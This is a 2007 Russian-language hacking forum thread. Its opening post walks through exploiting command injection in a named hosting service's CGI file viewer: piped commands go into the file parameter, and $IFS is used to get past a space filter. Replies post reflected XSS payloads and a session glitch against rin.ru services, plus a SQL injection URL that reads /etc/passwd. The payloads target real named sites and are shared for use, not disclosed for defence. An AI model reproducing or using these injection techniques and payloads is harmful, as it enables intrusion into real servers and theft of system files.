![]() |
Уязвимость хостинга!-=sbn.bz=-
Недавно читал старый номер ][ , нашел статью FORBA о том как он ломал один хостинг. Вот и решил порыть тоже и нашел очень интересную дыру (cgi)в sbn.bz -тут можно зарегать бесплатный сайт(типа народа).
Для начала я зарегал себе акк - xxx.pbnet.ru Затем попав в панель редактирования моего нового проекта, я увидел ссылку :Загрузка файлов на сервер: в самом низу страницы. Осмотрелся и решил попробовать загрузить файлик с компа, затем решил создать файл в панели. Ввел имя файла hackme.txt, выбрал простой редактор и нажал создать. Вот строка сост.браузера после создания Код:
http://sbn.bz/cgi-bin/file_viewer.pl?file=hackme.txt&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&l=1&a=edit_fileПосле создания файла я решил просмотреть файл Код:
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=hackme.txt&l=1&file=hackme.txt&l=1 Тут меня осенило, а если вместо hackme.txt вставить пайпы с командой внутри --|id| и что вы думаете все прокатило и я увидел мои права на сервере uid=515(www) gid=510(www) groups=510(www) Затем по обычной схеме я решил проверить ОС, но команда uname -a не выполнилась, но я сразу понял в чем дело. Просто пробел фильтровался перловым скриптом его я заменил $IFS. Код:
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|uname$IFS-a|&l=1Решил вывести листинг файлов на сервере и тут все вышло Код:
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|ls$IFS-la|Код:
total 336Но опять натолкнулся на ж...Если вставить в пайпы запрос вида --- cd$IFS/var/www/html/sbn/cgi-bin;ls, ничего опять не выполняется, скрипт просто режит мой запрос. ; --режит. Ковырялся долго, но так и не залил не шелл не бекдор. Нашел еще как можно выполнить команды которые не выполнялись выше например ls Код:
http://sbn.bz/cgi-bin/file_viewer.pl?sid=NHwfwuwredtttgnVBrUU4acLimAs6TrU&file=/|ls|&dir=А если выполнить тоже самое только ls$IFS-la| без сохранения тоже выводит файлы только в редакторе, а не при просмотре созданного файла! :) Код:
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&file=/|ls$IFS-la|&dir=Вот так за полчаса я зарегал себе сайт и нашел брешь, так что надо уволить прогаммиста. Спасибо за внимание. (с) fly 2007 |
гыгыгыгы.
там ещё и пасив xss Цитата:
|
сЕЙЧАС КОПАЮ RIN.RU Все их проекты.
Вот на днях XSS ЕЩЕ НАШЕЛ http://find.rin.ru/cgi-bin/charno/pipe.pl?text=pfff%3C/a%3E%3Cimg%20src=http://forum.antichat.ru/antichat/pic/logo.gif%3E |
Еще нашел один глюк на cash.rin.ru
ИдеМ регистрировать кошелек --- > http://cash.rin.ru/cgi-bin/reg.pl?l=1&sid= Затем ставим ---- ПРИМЕР (любое значение после reg.pl?l=1&sid=)-------http://cash.rin.ru/cgi-bin/reg.pl?l=1&sid=HACKED И вы увидите, что форма регистрации остается, а вот панель для ввода пароля меняется на панель якобы уже зареганного пользователя! |
Угу, но вроде явной пользы из этого не извлечешь.
|
Ca$hed ---- ОЧЕРЕДНАЯ БАГА В Rin СЕРВИСИ
Вот и XSS опять нашел в rin ---> cash.rin.ru
Пример1: Код:
http://cash.rin.ru/cgi-bin/sendpass.pl?l=1&email=%20%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert('Ca$hed%20by%20fLy')%3B%3C/ScRiPt%3E&a=send&l=1Код:
http://cash.rin.ru/cgi-bin/sendpass.pl?l=1&email=%22+onmouseover=%22alert('Ca$hed%20by%20fLy')&a=send&l=1 |
И вот еще SQL в ---socio.rin.ru
Код:
http://socio.rin.ru/cgi-bin/article.pl?idp=-11'+union+select+1,load_file('/etc/passwd')/* |
2 fly
там довольно-таки много читалок, скулей итп... про xss вообще промолчу ) |
Цитата:
|
fly - а как там файлы читать?
cat file не катит чета) |
| Время: 05:58 |